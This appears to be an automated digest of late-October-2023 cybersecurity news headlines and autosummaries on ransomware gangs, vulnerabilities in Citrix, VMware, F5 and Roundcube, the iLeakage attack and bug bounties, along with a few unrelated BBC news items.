            HackerOne has announced that its bug bounty programs have awarded over $300 million in rewards to ethical hackers and vulnerability researchers since the platform's inception. [...] "

            Autosummary: Areas ethical hackers focused their efforts this year (HackerOne) Other opinions recorded in the report include motivation and discouraging factors, with bounties playing the biggest (73%) role in participating, followed by an abundance of flaws (50%), opportunity to learn (45%), varied scope (46%), and quick payments (42%). "


            History of slavery continues to haunt British royals

            ransomware
            2023-10-28 https://www.bbc.co.uk/news/uk-67150357?at_medium=RSS&at_campaign=KARANGA
            As the King heads for Kenya, royal links to colonialism and slavery will be under scrutiny. "

            Autosummary: "


            IoT security threats highlight the need for zero trust principles

            industry
            2023-10-27 https://www.helpnetsecurity.com/2023/10/27/iot-malware-attacks/

            The high number of attacks on IoT devices represents a 400% increase in malware compared to the previous year, according to Zscaler. The increasing frequency of malware attacks targeting IoT devices is a significant concern for OT security, as the mobility of malware can facilitate movement across different networks, potentially endangering critical OT infrastructure. ThreatLabz focused on understanding IoT device activity and attributes via device fingerprinting and analyzing the IoT malware threat landscape. As more … More

            The post IoT security threats highlight the need for zero trust principles appeared first on Help Net Security.

            "

            Autosummary: IoT malware threatens industrial manufacturing OT processes Manufacturing and retail accounted for nearly 52% of IoT device traffic, with 3D printers, geolocation trackers, industrial control devices, automotive multimedia systems, data collection terminals, and payment terminals sending the majority of signals over digital networks. "


            AI strengthens banking’s defense against fraud

            financial
            2023-10-27 https://www.helpnetsecurity.com/2023/10/27/payment-technology-ai-biometrics/

            Consumers are ready for the next wave of payment technology, including deployment of AI-driven biometrics to verify identity in digital-first account opening processes, according to Entrust. The key to future payment solutions 63% of respondents indicated that they are comfortable with AI helping their bank detect fraud. Almost half of respondents abandoned a new bank account application after starting because it didn’t feel secure or was too cumbersome. The new wave of technology needs to … More

            The post AI strengthens banking’s defense against fraud appeared first on Help Net Security.

            "

            Autosummary: 78% of respondents indicated they would prefer to do their basic daily banking online including making deposits or withdrawals, applying for a credit card, and opening a checking, savings or investment account. "


            F5 Issues Warning: BIG-IP Vulnerability Allows Remote Code Execution

            exploits
            2023-10-27 https://thehackernews.com/2023/10/f5-issues-warning-big-ip-vulnerability.html
            F5 has alerted customers of a critical security vulnerability impacting BIG-IP that could result in unauthenticated remote code execution. The issue, rooted in the configuration utility component, has been assigned the CVE identifier CVE-2023-46747, and carries a CVSS score of 9.8 out of a maximum of 10. "This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP "

            Autosummary: "


            Apple news: iLeakage attack, MAC address leakage bug

            exploits
            2023-10-27 https://www.helpnetsecurity.com/2023/10/27/ileakage-attack-mac-address-leakage/

            On Wednesday, Apple released security updates for all supported branches of iOS and iPadOS, macOS, tvOS, watchOS and Safari. This time around, the updates did not garner as much attention as when they deliver a zero-day fix, though it has to be mentioned that the company has finally delivered a patch for CVE-2023-32434, a code execution vulnerability exploited to deliver the extremely stealthy TriangleDB spyware, to the currently oldest supported iOS/iPadOS branch (15.x). MAC address … More

            The post Apple news: iLeakage attack, MAC address leakage bug appeared first on Help Net Security.

            "

            Autosummary: MAC address leakage Another vulnerability of note fixed this Wednesday with the release of iOS 17.1 and iPadOS 17.1, iOS 16.7.2 and iPadOS 16.7.2, tvOS 17.1 and watchOS 10.1 is CVE-2023-42846, a bug that made a privacy-enhancing feature (“Private Wi-Fi Address”) not work as intended. "


            Google Expands Its Bug Bounty Program to Tackle Artificial Intelligence Threats

            exploits
            2023-10-27 https://thehackernews.com/2023/10/google-expands-its-bug-bounty-program.html
            Google has announced that it's expanding its Vulnerability Rewards Program (VRP) to reward researchers for finding attack scenarios tailored to generative artificial intelligence (AI) systems in an effort to bolster AI safety and security. "Generative AI raises new and different concerns than traditional digital security, such as the potential for unfair bias, model manipulation or "

            Autosummary: "


            Lazarus hackers breached dev repeatedly to deploy SIGNBT malware

            exploits
            2023-10-27 https://www.bleepingcomputer.com/news/security/lazarus-hackers-breached-dev-repeatedly-to-deploy-signbt-malware/
            The North Korean Lazarus hacking group repeatedly compromised a software vendor using flaws in vulnerable software despite multiple patches and warnings being made available by the developer. [...] "

            Autosummary: Malware loading process (Kaspersky) LPEClient is an info-stealer and malware loader in itself, which, in its latest versions, Kaspersky says demonstrates significant evolution compared to previously documented samples. "


            Hackers earn over $1 million for 58 zero-days at Pwn2Own Toronto

            exploits
            2023-10-27 https://www.bleepingcomputer.com/news/security/hackers-earn-over-1-million-for-58-zero-days-at-pwn2own-toronto/
            The Pwn2Own Toronto 2023 hacking competition has ended with security researchers earning $1,038,500 for 58 zero-day exploits (and multiple bug collisions) targeting consumer products between October 24 and October 27. [...] "

            Autosummary: "


            The Week in Ransomware - October 27th 2023 - Breaking Records

            exploits ransomware
            2023-10-27 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-27th-2023-breaking-records/
            Ransomware attacks are increasing significantly, with reports indicating that last month was a record month for ransomware attacks in 2023. [...] "

            Autosummary: We also learned of new cyberattacks or more information was shared about existing ones, including: Contributors and those who provided new ransomware information and stories this week include: @Seifreed, @LawrenceAbrams, @billtoulas, @Ionut_Ilascu, @demonslay335, @fwosar, @BleepinComputer, @serghei, @malwrhunterteam, @Avast, @kaspersky, @1ZRR4H, @NCCGroupplc, @Imperva, @Webroot, @MsftSecIntel, @pcrisk, @BushidoToken, @BrettCallow, and @security_score." Octo Tempest is also known as Scattered Spider, Oktapus, and UNC3944 and is believed to be behind recent ransomware attacks on MGM Resorts and Caesars and past attacks on Reddit, MailChimp, Twilio, DoorDash, and Riot Games. "


            Lockbit ransomware gang claims to have stolen data from Boeing

            exploits ransomware
            2023-10-27 https://securityaffairs.com/153149/cyber-crime/lockbit-ransomware-gang-boeing.html

            The Lockbit ransomware gang claims to have hacked the aerospace manufacturer and defense contractor Boeing and threatened to leak the stolen data. The Boeing Company, commonly known as Boeing, is one of the world’s largest aerospace manufacturers and defense contractors. In 2022, Boeing recorded $66.61 billion in sales, and the aerospace giant has 156,000 employees (2022). The Lockbit ransomware […]

            The post Lockbit ransomware gang claims to have stolen data from Boeing appeared first on Security Affairs.

            "

            Autosummary: “Boeing, the 60 billion Company, together with its subsidiaries, designs, develops, manufactures, sells, services, and supports commercial jetliners, military aircraft, satellites, missile defense, human space flight, and launch systems and services worldwide.” "


            Octo Tempest cybercriminal group is "a growing concern"—Microsoft

            ciber
            2023-10-27 https://www.malwarebytes.com/blog/news/2023/10/ransomware-affiliate-octo-tempest-is-a-growing-concern-for-organizations-across-multiple-industries

            Categories: News

            Categories: Ransomware

            Tags: ALPHV

            Tags: Octo Tempest

            Tags: RaaS

            Tags: LOTL

            Tags: social engineering

            Tags: SIM swapping

            A group of cybercriminals known for advanced social engineering attacks has joined one of the biggest ransomware groups as an affiliate.

            (Read more...)

            The post Octo Tempest cybercriminal group is "a growing concern"—Microsoft appeared first on Malwarebytes Labs.

            "

            Autosummary: Microsoft reports that in doing so, Octo Tempest progressively broadened the number of industries it targeted for extortion, including natural resources, gaming, hospitality, consumer products, retail, managed service providers, manufacturing, law, technology, and financial services. Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Since then the group has expanded its range of activities to include targeting organizations providing cable telecommunications, email, and tech services, and partnering with the ALPHV/BlackCat ransomware group. "


            OT cyber attacks proliferating despite growing cybersecurity spend

            ciber
            2023-10-26 https://www.helpnetsecurity.com/2023/10/26/cyber-physical-systems-cps/

            The sharp increase in attacks on operational technology (OT) systems can be primarily attributed to two key factors: the escalating global threats posed by nation-state actors and the active involvement of profit-driven cybercriminals (often sponsored by the former). The lack of success on the defense side can be attributed to several factors: the complexity of OT environments, the convergence of information technology (IT) and OT, insider attacks, supply chain vulnerabilities, and others. Despite increased cybersecurity … More

            The post OT cyber attacks proliferating despite growing cybersecurity spend appeared first on Help Net Security.

            "

            Autosummary: The advent of cyber physical systems With the convergence of IT, OT, IoT (Internet of Things), and IIoT (Industrial Internet of Things), cyber physical systems (CPS) emerged. Since cyber-attacks and human errors can come from the outside, inside, supply chain, and other contracted third parties, a network-based anomaly detection solution would not cover all the bases. "


            Ransomware groups continue to increase their operational tempo

            exploits ransomware
            2023-10-26 https://www.helpnetsecurity.com/2023/10/26/ransomware-activity-q3-2023/

            Q3 of 2023 continued an ongoing surge in ransomware activity, according to GuidePoint Security. GuidePoint Research and Intelligence Team (GRIT) observed a nearly 15% increase in ransomware activity since Q2 due to an increased number of ransomware groups, including 10 new emerging groups tracked during this quarter. In the third quarter, GRIT tracked 1,353 publicly posted ransomware victims claimed by 46 different threat groups. Through the first three quarters of 2023, GRIT has tracked a … More

            The post Ransomware groups continue to increase their operational tempo appeared first on Help Net Security.

            "

            Autosummary: LockBit, Cl0p, and Alphv lead ransomware activity in Q3 2023 The top three most active ransomware groups were Lockbit, Cl0p, and Alphv. "


            Iranian Group Tortoiseshell Launches New Wave of IMAPLoader Malware Attacks

            exploits
            2023-10-26 https://thehackernews.com/2023/10/iranian-group-tortoiseshell-launches.html
            The Iranian threat actor known as Tortoiseshell has been attributed to a new wave of watering hole attacks that are designed to deploy a malware dubbed IMAPLoader. "IMAPLoader is a .NET malware that has the ability to fingerprint victim systems using native Windows utilities and acts as a downloader for further payloads," the PwC Threat Intelligence said in a Wednesday analysis. "It uses email "

            Autosummary: "


            Winter Vivern APT exploited zero-day in Roundcube webmail software in recent attacks

            exploits
            2023-10-26 https://securityaffairs.com/153030/apt/winter-vivern-0day-roundcube.html

            Russia-linked threat actor Winter Vivern has been observed exploiting a zero-day flaw in Roundcube webmail software. Russian APT group Winter Vivern (aka TA473) has been observed exploiting a zero-day flaw in Roundcube webmail software on October 11, 2023. ESET researchers pointed out that it is a different vulnerability from CVE-2020-35730, which the group exploited in other attacks. The Winter […]

            The post Winter Vivern APT exploited zero-day in Roundcube webmail software in recent attacks appeared first on Security Affairs.

            "

            Autosummary: Winter Vivern APT exploited zero-day in Roundcube webmail software in recent attacks Pierluigi Paganini October 26, 2023 October 26, 2023 Russia-linked threat actor Winter Vivern has been observed exploiting a zero-day flaw in Roundcube webmail software. "


            ASVEL basketball club slam dunked by NoEscape ransomware gang, data stolen

            exploits ransomware
            2023-10-26 https://www.bitdefender.com/blog/hotforsecurity/asvel-basketball-club-slam-dunked-by-noescape-ransomware-gang-data-stolen/
            A high-profile French basketball team has fallen victim to the NoEscape ransomware-as-a-service group, who claim to have stolen 32 GB of data including sensitive personal information about the club's star players. Read more in my article on the Hot for Security blog. "

            Autosummary: ASVEL, which has brought in third-party experts to help with its response to the attack, says that its club activities have not been disrupted, and that - so far - it has not seen evidence that fans' payment information has been compromised. "


            Humans are still better than AI at crafting phishing emails, but for how long?

            financial
            2023-10-26 https://www.helpnetsecurity.com/2023/10/26/humans-ai-phishing-emails/

            Humans are still better at crafting phishing emails compared to AI, but not by far and likely not for long, according to research conducted by IBM X-Force Red. Creating phishing emails: Humans vs. AI The researchers wanted to see whether ChatGPT is as capable of writing a “good” phishing email as attackers are. “As someone who writes phishing emails for a living, I was excited to find out the answer,” said Stephanie Carruthers, Chief People … More

            The post Humans are still better than AI at crafting phishing emails, but for how long? appeared first on Help Net Security.

            "

            Autosummary: (Source: IBM X-Force Red) Concurrently, X-Force Red social engineers crafted their own phishing email, after using OSINT techniques to gather information that would help them choose the sender to impersonate and decide on the lure (an internal company survey). "


            Seemplicity integrates with Wiz to accelerate remediation

            government
            2023-10-26 https://www.helpnetsecurity.com/2023/10/26/seemplicity-wiz-integration/

            Seemplicity announced its technical integration with cloud security provider Wiz. As a certified Wiz Integration (WIN) platform partner, Seemplicity enables joint customers to seamlessly integrate its Security Remediation Operations platform into their existing Wiz workflows to accelerate remediation. “Today security teams manage an overwhelming number of findings from an ever-growing security testing tech stack, making efficient risk and vulnerability remediation a near-impossible task,” said Yoran Sirkis, CEO of Seemplicity. “Ad-hoc processes, unidentified remediation teams, and … More

            The post Seemplicity integrates with Wiz to accelerate remediation appeared first on Help Net Security.

            "

            Autosummary: "


            Seiko confirmed a data breach after BlackCat attack

            financial ransomware
            2023-10-26 https://securityaffairs.com/153070/data-breach/seiko-data-breach-blackcat-attack.html

            Japanese watchmaker Seiko revealed that the attack it suffered earlier this year was carried out by the BlackCat ransomware gang. On August 10, 2023, the Japanese maker of watches Seiko disclosed a data breach following a cyber attack. “Seiko Group Corporation (hereinafter referred to as “the Company” or “we”) has confirmed that on July […]

            The post Seiko confirmed a data breach after BlackCat attack appeared first on Security Affairs.


            Autosummary: Leaked information includes:
            - SWC customer information, including names, addresses, telephone numbers, and/or email addresses (note: credit card information was not compromised)
            - Contact information for counterparties involved in business transactions with SGC, SWC, and/or SII, including the individual’s name, company affiliation, job title, company address, company phone number, and/or company email address
            - Information supplied by applicants for employment with SGC and/or SWC, including names, addresses, phone numbers, email addresses, and/or educational background information
            - Personnel information, including names and/or email addresses, for both current and former employees of SGC and its group companies
            Financial information, such as credit card information, of Seiko Watch customers was not exposed in the security breach.


            France says Russian state hackers breached numerous critical networks

            government rusia-ucrania
            2023-10-26 https://www.bleepingcomputer.com/news/security/france-says-russian-state-hackers-breached-numerous-critical-networks/
            The Russian APT28 hacking group (aka "Strontium" or "Fancy Bear") has been targeting government entities, businesses, universities, research institutes, and think tanks in France since the second half of 2021. [...]

            Autosummary: ANSSI also reports that APT28 uses a range of VPN clients, including SurfShark, ExpressVPN, ProtonVPN, PureVPN, NordVPN, CactusVPN, WorldVPN, and VPNSecure.


            StripedFly malware framework infects 1 million Windows, Linux hosts

            exploits Linux
            2023-10-26 https://www.bleepingcomputer.com/news/security/stripedfly-malware-framework-infects-1-million-windows-linux-hosts/
            A sophisticated cross-platform malware platform named StripedFly flew under the radar of cybersecurity researchers for five years, infecting over a million Windows and Linux systems during that time. [...]

            Autosummary: After investigating the injected code, they determined it downloads and executes additional files, such as PowerShell scripts, from legitimate hosting services like Bitbucket, GitHub, and GitLab. It achieves persistence using systemd services, an autostarting .desktop file, or by modifying various profile and startup files, such as /etc/rc*, profile, bashrc, or inittab files. "The malware payload encompasses multiple modules, enabling the actor to perform as an APT, as a crypto miner, and even as a ransomware group," reads Kaspersky's report.


            Microsoft Warns as Scattered Spider Expands from SIM Swaps to Ransomware

            exploits ransomware
            2023-10-26 https://thehackernews.com/2023/10/microsoft-warns-as-scattered-spider.html
            The prolific threat actor known as Scattered Spider has been observed impersonating newly hired employees in targeted firms as a ploy to blend into normal on-hire processes, take over accounts, and breach organizations across the world. Microsoft, which disclosed the activities of the financially motivated hacking crew, described the adversary as "one of the most dangerous financial criminal

            Autosummary: Octo Tempest has since diversified its targeting to include email and tech service providers, gaming, hospitality, retail, managed service providers (MSPs), manufacturing, technology, and financial sectors, while simultaneously emerging as an affiliate for the BlackCat ransomware gang in mid-2023 to extort victims.


            Record-Breaking 100 Million RPS DDoS Attack Exploits HTTP/2 Rapid Reset Flaw

            exploits
            2023-10-26 https://thehackernews.com/2023/10/record-breaking-100-million-rps-ddos.html
            Cloudflare on Thursday said it mitigated thousands of hyper-volumetric HTTP distributed denial-of-service (DDoS) attacks that exploited a recently disclosed flaw called HTTP/2 Rapid Reset, 89 of which exceeded 100 million requests per second (RPS). "The campaign contributed to an overall increase of 65% in HTTP DDoS attack traffic in Q3 compared to the previous quarter," the web infrastructure

            Autosummary: Some of the top industries targeted by HTTP DDoS attacks include gaming, IT, cryptocurrency, computer software, and telecom, with the U.S., China, Brazil, Germany, and Indonesia accounting for the biggest sources of application layer (L7) DDoS attacks.


            Phony Corsair job vacancy targets LinkedIn users with DarkGate malware

            exploits
            2023-10-26 https://www.tripwire.com/state-of-security/phony-job-vacancy-targets-linkedin-users-darkgate-malware
            A Vietnamese cybercrime gang is being blamed for a malware campaign that has seen bogus adverts posted on LinkedIn, pretending to be related to jobs at computer memory and gaming accessories firm Corsair. Read more in my article on the Tripwire State of Security blog.



            iLeakage: New Safari Exploit Impacts Apple iPhones and Macs with A and M-Series CPUs

            exploits
            2023-10-26 https://thehackernews.com/2023/10/ileakage-new-safari-exploit-impacts.html
            A group of academics has devised a novel side-channel attack dubbed iLeakage that exploits a weakness in the A- and M-series CPUs running on Apple iOS, iPadOS, and macOS devices, enabling the extraction of sensitive information from the Safari web browser. "An attacker can induce Safari to render an arbitrary webpage, subsequently recovering sensitive information present within it using

            Autosummary: News of iLeakage comes months after cybersecurity researchers revealed details of a trifecta of side-channel attacks – Collide+Power (CVE-2023-20583), Downfall (CVE-2022-40982), and Inception (CVE-2023-20569) – that could be exploited to leak sensitive data from modern CPUs.


            iLeakage attack exploits Safari to steal data from Apple devices

            exploits
            2023-10-26 https://securityaffairs.com/153092/hacking/ileakage-attack-technique.html

            Boffins devised a new iLeakage side-channel speculative execution attack that exploits Safari to steal sensitive data from Macs, iPhones, and iPads. A team of researchers from the University of Michigan, Georgia Institute of Technology, and Ruhr University Bochum has devised a transient side-channel speculative execution attack that exploits the Safari web browser to steal sensitive information […]

            The post iLeakage attack exploits Safari to steal data from Apple devices appeared first on Security Affairs.


            Autosummary: A team of researchers from the University of Michigan, Georgia Institute of Technology, and Ruhr University Bochum has devised a transient side-channel speculative execution attack that exploits the Safari web browser to steal sensitive information from Macs, iPhones and iPads. iLeakage is a new Spectre-like side-channel attack; the researchers demonstrated that an attacker can induce Safari to render an arbitrary webpage and then recover sensitive information present within it using speculative execution.


            Microsoft: Octo Tempest is one of the most dangerous financial hacking groups

            financial
            2023-10-26 https://www.bleepingcomputer.com/news/security/microsoft-octo-tempest-is-one-of-the-most-dangerous-financial-hacking-groups/
            Microsoft has published a detailed profile of a native English-speaking threat actor with advanced social engineering capabilities it tracks as Octo Tempest, which targets companies in data extortion and ransomware attacks. [...]

            Autosummary: The researchers provide the following additional tools and techniques that Octo Tempest uses in their attacks:
            - open-source tools: ScreenConnect, FleetDeck, AnyDesk, RustDesk, Splashtop, Pulseway, TightVNC, LummaC2, Level.io, Mesh, TacticalRMM, Tailscale, Ngrok, WsTunnel, Rsocx, and Socat
            - deploying Azure virtual machines to enable remote access via RMM installation, or modification of existing resources via the Azure serial console
            - adding MFA methods to existing users
            - using the tunneling tool Twingate, which leverages Azure Container Instances as a private connector (without public network exposure)
            “This is notable in that, historically, Eastern European ransomware groups refused to do business with native English-speaking criminals” - Microsoft
            The more recent attacks from this group target organizations in a variety of sectors, including gaming, natural resources, hospitality, consumer products, retail, managed service providers, manufacturing, law, technology, and financial services.


            Patch...later? Safari iLeakage bug not fixed

            exploits
            2023-10-26 https://www.malwarebytes.com/blog/news/2023/10/ileakage

            Categories: Exploits and vulnerabilities, News

            Apple has fixed a bunch of security flaws, but not iLeakage, a side-channel vulnerability in Safari.

            The post Patch...later? Safari iLeakage bug not fixed appeared first on Malwarebytes Labs.


            Autosummary: According to the researchers, the super-secure Lockdown Mode that's available on Apple's Macs, phones, and tablets will disable iLeakage, but Lockdown Mode can impact performance and, as Apple points out, "When Lockdown Mode is enabled, your device won’t function like it typically does."


            Hurricane Otis: Dozens killed in Mexico's Guerrero state

            latam government
            2023-10-26 https://www.bbc.co.uk/news/world-latin-america-67227493?at_medium=RSS&at_campaign=KARANGA
            More than two dozen people were killed as the powerful storm swept through Guerrero, officials say.



            Watch: Seaside hotels smashed by Hurricane Otis in Mexico

            latam
            2023-10-26 https://www.bbc.co.uk/news/world-latin-america-67216467?at_medium=RSS&at_campaign=KARANGA
            The hurricane brought wind speeds of up to 165mph (270km/h), making landfall near Acapulco.



            What is operational risk and why should you care? Assessing SEC rule readiness for OT and IoT

            industry
            2023-10-25 https://www.helpnetsecurity.com/2023/10/25/operational-risk/

            The newly released Securities and Exchange Commission (SEC) cyber incident disclosure rules have been met with mixed reviews. Of particular concern is whether public companies that own and operate industrial control systems and connected IoT infrastructure are prepared to fully define operational risk, and are therefore equipped to fully disclose material business risk from cyber incidents. This concern also provides a fresh opportunity for preparedness. The rules require registrants to disclose material cybersecurity incidents (via … More

            The post What is operational risk and why should you care? Assessing SEC rule readiness for OT and IoT appeared first on Help Net Security.


            Autosummary: Security teams at public companies who have identified and outlined their operational risk and critical assets have three key objectives before December 15:
            - to understand operational risk and map it to their company’s definitions of materiality
            - to evaluate and take stock of OT/IoT assets not covered by existing IT security controls or capabilities
            - to incorporate both assessments into reporting requirements outlined in the SEC rule for describing how the organization assesses, identifies, and manages material risks
            Avoiding vs. mitigating operational risk: The reactive nature of cybersecurity has led to a reality in which boards and executive leaders attempt to mitigate risk by tasking security teams to avoid risk. Once critical assets are identified, they need to be categorized or inventoried, because your team will be incapable of performing root cause analysis on any asset that is not accounted for, monitored, baselined, hardened, or queried.


            Strategies to overcome cybersecurity misconceptions

            ciber
            2023-10-25 https://www.helpnetsecurity.com/2023/10/25/cybersecurity-misconceptions-video/

            Many CISOs may believe their cybersecurity defenses are robust enough to repel any attack, but there are critical misconceptions they may be harboring. In this Help Net Security video, Kevin Kirkwood, Deputy CISO at LogRhythm, stresses that one of the most significant pitfalls is the assumption that their defenses are “good enough.” He believes this complacency can lead to a dangerous sense of security, leaving organizations vulnerable to evolving ransomware threats. The reality is that … More

            The post Strategies to overcome cybersecurity misconceptions appeared first on Help Net Security.




            Alert: PoC Exploits Released for Citrix and VMware Vulnerabilities

            exploits
            2023-10-25 https://thehackernews.com/2023/10/alert-poc-exploits-released-for-citrix.html
            Virtualization services provider VMware has alerted customers to the existence of a proof-of-concept (PoC) exploit for a recently patched security flaw in Aria Operations for Logs. Tracked as CVE-2023-34051 (CVSS score: 8.1), the high-severity vulnerability relates to a case of authentication bypass that could lead to remote code execution. "An unauthenticated, malicious actor can inject files

            Autosummary: The latest developments also follow the release of updates for three critical remote code execution vulnerabilities in SolarWinds Access Rights Manager (CVE-2023-35182, CVE-2023-35185, and CVE-2023-35187, CVSS scores: 9.8) that remote attackers could use to run code with SYSTEM privileges.


            Roundcube webmail zero-day exploited to spy on government entities (CVE-2023-5631)

            exploits government
            2023-10-25 https://www.helpnetsecurity.com/2023/10/25/roundcube-webmail-zero-day-exploited-to-spy-on-government-entities-cve-2023-5631/

            The Winter Vivern APT group has been exploiting a zero-day vulnerability (CVE-2023-5631) in Roundcube webmail servers to spy on email communications of European governmental entities and a think tank, according to ESET researchers. “Exploitation of the XSS vulnerability can be done remotely by sending a specially crafted email message,” the researchers noted. “No manual interaction other than viewing the message in a web browser is required.” Exploiting CVE-2023-5631: Roundcube is an open-source browser-based email client … More

            The post Roundcube webmail zero-day exploited to spy on government entities (CVE-2023-5631) appeared first on Help Net Security.


            Autosummary: CVE-2023-5631 is a cross-site scripting (XSS) vulnerability in Roundcube’s server-side script rcube_washtml.php, which can be triggered to load arbitrary JavaScript code via an HTML e-mail message with a specially crafted SVG document.


            VMware patches critical vulnerability in vCenter Server (CVE-2023-34048)

            exploits
            2023-10-25 https://www.helpnetsecurity.com/2023/10/25/cve-2023-34048/

            VMware has fixed a critical out-of-bounds write vulnerability (CVE-2023-34048) and a moderate-severity information disclosure flaw (CVE-2023-34056) in vCenter Server, its popular server management software. About CVE-2023-34048 and CVE-2023-34056 CVE-2023-34048 allows an attacker with network access to a vulnerable vCenter Server virtual appliance to trigger an out-of-bounds write that can lead to remote code execution. It has been reported by Grigory Dorodnov of Trend Micro Zero Day Initiative and there are no indications of it being … More

            The post VMware patches critical vulnerability in vCenter Server (CVE-2023-34048) appeared first on Help Net Security.




            The Rise of S3 Ransomware: How to Identify and Combat It

            exploits ransomware
            2023-10-25 https://thehackernews.com/2023/10/the-rise-of-s3-ransomware-how-to.html
            In today's digital landscape, around 60% of corporate data now resides in the cloud, with Amazon S3 standing as the backbone of data storage for many major corporations. Despite S3 being a secure service from a reputable provider, its pivotal role in handling vast amounts of sensitive data (customer personal information, financial data, intellectual property, etc.), provides a juicy target for

            Autosummary: Each offers distinct advantages and trade-offs:
            - CloudTrail data events: offer visibility into resource operations performed on or within a resource in real time, but come with potential cost implications due to high API call volumes
            - Server access logs: free access to records for each request made to your S3 bucket, but come with potential delays in log availability and potentially less logging integrity
            Despite S3 being a secure service from a reputable provider, its pivotal role in handling vast amounts of sensitive data (customer personal information, financial data, intellectual property, etc.) provides a juicy target for threat actors.


            Act Now: VMware Releases Patch for Critical vCenter Server RCE Vulnerability

            exploits
            2023-10-25 https://thehackernews.com/2023/10/act-now-vmware-releases-patch-for.html
            VMware has released security updates to address a critical flaw in the vCenter Server that could result in remote code execution on affected systems. The issue, tracked as CVE-2023-34048 (CVSS score: 9.8), has been described as an out-of-bounds write vulnerability in the implementation of the DCE/RPC protocol. "A malicious actor with network access to vCenter Server may trigger an out-of-bounds



            Malvertising Campaign Targets Brazil's PIX Payment System with GoPIX Malware

            exploits latam
            2023-10-25 https://thehackernews.com/2023/10/malvertising-campaign-targets-brazils.html
            The popularity of Brazil's PIX instant payment system has made it a lucrative target for threat actors looking to generate illicit profits using a new malware called GoPIX. Kaspersky, which has been tracking the active campaign since December 2022, said the attacks are pulled off using malicious ads that are served when potential victims search for "WhatsApp web" on search engines. "The

            Autosummary: The latest to join the stealer ecosystem is Lumar, which was first advertised by a user named Collector on cybercrime forums, marketing its capabilities to capture Telegram sessions, harvest browser cookies and passwords, retrieve files, and extract data from crypto wallets. "Despite having all these functionalities, the malware is relatively small in terms of size (only 50 KB), which is partly due to the fact that it is written in C," Kaspersky noted.


            Citrix warns admins to patch NetScaler CVE-2023-4966 bug immediately

            exploits
            2023-10-25 https://securityaffairs.com/153016/security/citrix-warns-patch-cve-2023-4966.html

            Citrix warned of attacks actively exploiting the vulnerability CVE-2023-4966 in NetScaler ADC and Gateway appliances. Citrix is urging administrators to secure all NetScaler ADC and Gateway appliances against the CVE-2023-4966 vulnerability, which is actively exploited in attacks. On October 10, Citrix published a security bulletin related to a critical vulnerability, tracked as CVE-2023-4966, in Citrix NetScaler ADC/Gateway devices. […]

            The post Citrix warns admins to patch NetScaler CVE-2023-4966 bug immediately appeared first on Security Affairs.


            Autosummary: “Cloud Software Group strongly urges customers of NetScaler ADC and NetScaler Gateway to install the relevant updated versions of NetScaler ADC and NetScaler Gateway as soon as possible:
            - NetScaler ADC and NetScaler Gateway 14.1-8.50 and later releases
            - NetScaler ADC and NetScaler Gateway 13.1-49.15 and later releases of 13.1
            - NetScaler ADC and NetScaler Gateway 13.0-92.19 and later releases of 13.0
            - NetScaler ADC 13.1-FIPS 13.1-37.164 and later releases of 13.1-FIPS
            - NetScaler ADC 12.1-FIPS 12.1-55.300 and later releases of 12.1-FIPS
            - NetScaler ADC 12.1-NDcPP 12.1-55.300 and later releases of 12.1-NDcPP
            Note: NetScaler ADC and NetScaler Gateway version 12.1 is now End-of-Life (EOL).”


            Seiko says ransomware attack exposed sensitive customer data

            exploits ransomware
            2023-10-25 https://www.bleepingcomputer.com/news/security/seiko-says-ransomware-attack-exposed-sensitive-customer-data/
            Japanese watchmaker Seiko has confirmed it suffered a Black Cat ransomware attack earlier this year, warning that the incident has led to a data breach, exposing sensitive customer, partner, and personnel information. [...]



            Citrix Bleed exploit lets hackers hijack NetScaler accounts

            exploits
            2023-10-25 https://www.bleepingcomputer.com/news/security/citrix-bleed-exploit-lets-hackers-hijack-netscaler-accounts/
            A proof-of-concept (PoC) exploit has been released for the "Citrix Bleed" vulnerability, tracked as CVE-2023-4966, that allows attackers to retrieve authentication session cookies from vulnerable Citrix NetScaler ADC and NetScaler Gateway appliances. [...]

            Autosummary: The Citrix Bleed flaw: The CVE-2023-4966 Citrix Bleed flaw is an unauthenticated buffer-related vulnerability affecting Citrix NetScaler ADC and NetScaler Gateway, network devices used for load balancing, firewall implementation, traffic management, VPN, and user authentication.


            Ransomware isn’t going away – the problem is only getting worse

            exploits
            2023-10-25 https://www.bleepingcomputer.com/news/security/ransomware-isnt-going-away-the-problem-is-only-getting-worse/
            Ransomware incidents continue to grow at an alarming pace, targeting the enterprise and governments worldwide. Learn more from Specops Software on how ransomware gangs gain initial access to networks and how to protect against attacks. [...]

            Autosummary: Recent ransomware attacks: Almost every day, we hear in the news about a major ransomware incident that hit a major organization; here are some recent ransomware incidents:
            - The LockBit ransomware group launched a ransomware attack against the city of Oakland in April 2023, halting the 311 public service
            - The Royal ransomware hit the city of Dallas IT infrastructure, halting many public services and exposing the personal information of 26,212 residents of Texas
            - The ransomware attack against Harvard Pilgrim Health Care in April 2023 resulted in access to the medical data of 2,550,922 patients
            Ransomware gangs are using more advanced techniques to infect their targets. The huge profits gained from ransomware attacks have made it a lucrative method for cybercriminals to earn money. To halt ransomware attacks that take advantage of end users' weak password practices, it is advisable to use Specops Password Policy, which extends the functionality of Group Policy in Active Directory and provides advanced password policy features, including:
            - Custom dictionary list to block the use of passwords that can be commonly used in your organization, like company name and location
            - Settings to combat predictable composition patterns like reusing part of the old password, consecutive characters, and incremental characters
            - Breached password protection with daily checks to block the use of over 4 billion unique compromised passwords found on known breached lists
            - Passphrase support
            Ransomware continues to evolve as a preferred cybercriminal business model.


            European govt email servers hacked using Roundcube zero-day

            exploits
            2023-10-25 https://www.bleepingcomputer.com/news/security/european-govt-email-servers-hacked-using-roundcube-zero-day/
            The Winter Vivern Russian hacking group has been exploiting a Roundcube Webmail zero-day since at least October 11 to attack European government entities and think tanks. [...]

            Autosummary: (Figure: Roundcube phishing email sample, via ESET) First spotted in April 2021, Winter Vivern has garnered attention for its deliberate targeting of government entities across the globe, including nations such as India, Italy, Lithuania, Ukraine, and the Vatican.


            Malwarebytes Identity Theft Protection defends users against online threats

            exploits
            2023-10-25 https://www.helpnetsecurity.com/2023/10/25/malwarebytes-identity-theft-protection/

